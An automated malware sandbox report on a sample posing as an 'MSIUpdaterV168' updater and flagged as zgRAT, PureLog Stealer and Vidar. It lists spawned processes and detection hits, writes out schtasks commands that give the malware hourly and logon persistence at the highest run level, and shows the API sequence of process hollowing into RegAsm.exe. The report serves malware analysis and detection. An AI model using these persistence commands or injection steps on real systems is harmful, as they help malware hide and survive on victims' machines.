Path:	C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Imagebase:	0x120000
File size:	1'854'464 bytes
MD5 hash:	97768AB0A4837757B74DE2AE892BADAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:16:15
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:16:15
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe
Imagebase:	0x120000
File size:	1'854'464 bytes
MD5 hash:	97768AB0A4837757B74DE2AE892BADAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:16:15
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x870000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe"
Imagebase:	0xe30000
File size:	430'592 bytes
MD5 hash:	F88272EA7674D3ACEDD8ADCF7643C598
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 284
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xc40000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	03:16:16
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7268 -s 288
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:16:17
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	03:16:17
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	03:16:17
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Imagebase:	0xc50000
File size:	528'384 bytes
MD5 hash:	0309DD0131150796EA99B30A62194FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:16:20
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Imagebase:	0x4c0000
File size:	430'592 bytes
MD5 hash:	F88272EA7674D3ACEDD8ADCF7643C598
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe"
Imagebase:	0x4f0000
File size:	528'384 bytes
MD5 hash:	0309DD0131150796EA99B30A62194FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe
Imagebase:	0x4c0000
File size:	430'592 bytes
MD5 hash:	F88272EA7674D3ACEDD8ADCF7643C598
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:16:18
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:16:19
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	03:16:19
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7632 -s 136
Imagebase:	0xa70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	03:16:19
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	03:16:19
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	03:16:20
Start date:	01/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe" /tn "MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xd50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	03:16:20
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	03:16:20
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe
Imagebase:	0xc50000
File size:	528'384 bytes
MD5 hash:	0309DD0131150796EA99B30A62194FAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	03:16:20
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Imagebase:	0xf50000
File size:	348'160 bytes
MD5 hash:	2FCB3543D06F526E93C7276356F557B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002E.00000000.1886815779.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	03:16:21
Start date:	01/07/2024
Path:	C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe"
Imagebase:	0x410000
File size:	348'160 bytes
MD5 hash:	2FCB3543D06F526E93C7276356F557B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	03:16:21
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	03:16:29
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	03:16:26
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xdf0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	52
Start time:	03:16:29
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	03:16:26
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x190000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	03:16:23
Start date:	01/07/2024
Path:	C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe
Imagebase:	0x610000
File size:	348'160 bytes
MD5 hash:	2FCB3543D06F526E93C7276356F557B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	03:16:29
Start date:	01/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x1c0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	03:16:25
Start date:	01/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.5%
Total number of Nodes:	2000
Total number of Limit Nodes:	50

Executed Functions

Function 005E018D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,005E00FF,005E00EF), ref: 005E02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005E030F
Wow64GetThreadContext.KERNEL32(00000130,00000000), ref: 005E032D
ReadProcessMemory.KERNELBASE(0000012C,?,005E0143,00000004,00000000), ref: 005E0351
VirtualAllocEx.KERNELBASE(0000012C,?,?,00003000,00000040), ref: 005E037C
TerminateProcess.KERNELBASE(0000012C,00000000), ref: 005E039B
WriteProcessMemory.KERNELBASE(0000012C,00000000,?,?,00000000,?), ref: 005E03D4
WriteProcessMemory.KERNELBASE(0000012C,00400000,?,?,00000000,?,00000028), ref: 005E041F
WriteProcessMemory.KERNELBASE(0000012C,-00000008,?,00000004,00000000), ref: 005E045D
Wow64SetThreadContext.KERNEL32(00000130,00A50000), ref: 005E0499
ResumeThread.KERNELBASE(00000130), ref: 005E04A8

Strings

VirtualAllocEx, xrefs: 005E028D
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 005E02FB
GetP, xrefs: 005E020F
SetThreadContext, xrefs: 005E02B3
TerminateProcess, xrefs: 005E038B
aryA, xrefs: 005E01D3
GetThreadContext, xrefs: 005E0267
CreateProcessA, xrefs: 005E0241
Load, xrefs: 005E01CB
ress, xrefs: 005E0217
WriteProcessMemory, xrefs: 005E02A0
VirtualAlloc, xrefs: 005E0254
ReadProcessMemory, xrefs: 005E027A
ResumeThread, xrefs: 005E02C9

Memory Dump Source

Source File: 00000000.00000002.1793689838.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_zyJWi2vy29.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-1257834847
Opcode ID: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction ID: 53e12aec569a6f31d1b17e31c5d3f22da22a75ce9488bf355e4f1ebdad7c4cd8
Opcode Fuzzy Hash: 6ed679946abb4a161c9f75f6101290084365813039212a6bd0c7882d8dd446c2
Instruction Fuzzy Hash: A7B1E57660028AAFDB60CF69CC80BDA77A5FF88714F158524EA0CAB341D774FA41CB94

Function 00344920 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,00344BD0,00000000,00000000,00000000), ref: 00344BBF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,?,?,?,?,?,?,?,?,00344C76), ref: 00344BC8

Strings

Earth, xrefs: 00344AD3
C, xrefs: 00344955
Own head, xrefs: 00344AAD

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID: CreateObjectSingleThreadWait
String ID: C$Earth$Own head
API String ID: 1891408510-3365287836
Opcode ID: b1954abaae907c069fc70aada207a5088522d8ae22980a14d65222e3db7b8d91
Instruction ID: fccc0c54c23d9f6ddeead7294eba07f7d3cb895d09ebd296cd09519414e7483b
Opcode Fuzzy Hash: b1954abaae907c069fc70aada207a5088522d8ae22980a14d65222e3db7b8d91
Instruction Fuzzy Hash: B7713071A083415BC716DF349C85B6BB7D8FF84304F140A3DF891AE192E7A0FA588B96

Function 00336AF1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1793337855.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true

Associated: 00000000.00000002.1793305813.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793371108.0000000000345000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793523977.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_320000_zyJWi2vy29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16119813b970236c133a25456643558266e9fbcd3b32f189285132fde21ad16f
Instruction ID: 0d202b6b8c5ba423a1d2179b454395599f1f1d69c204b7f1445f9ae85ad90517
Opcode Fuzzy Hash: 16119813b970236c133a25456643558266e9fbcd3b32f189285132fde21ad16f
Instruction Fuzzy Hash: 12F03071A21264AFCB16DB49C446A99B3FCEB45B51F1180A6E542DB151C2B4DD00CBD4

Function 00344D20 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(user32.dll,ShowWindow,BB9BFA91), ref: 00344D55
GetProcAddress.KERNEL32(00000000), ref: 00344D5C
GetConsoleWindow.KERNELBASE(?,00000000), ref: 00344D6B
GetModuleHandleA.KERNEL32(kernel32.dll,FreeConsole), ref: 00344D7F
GetProcAddress.KERNEL32(00000000), ref: 00344D86
FreeConsole.KERNELBASE ref: 00344D92

Part of subcall function 00344000: GetCurrentThreadId.KERNEL32 ref: 0034406A

Strings

user32.dll, xrefs: 00344D50
ShowWindow, xrefs: 00344D4B
kernel32.dll, xrefs: 00344D7A
FreeConsole, xrefs: 00344D75

Memory Dump Source

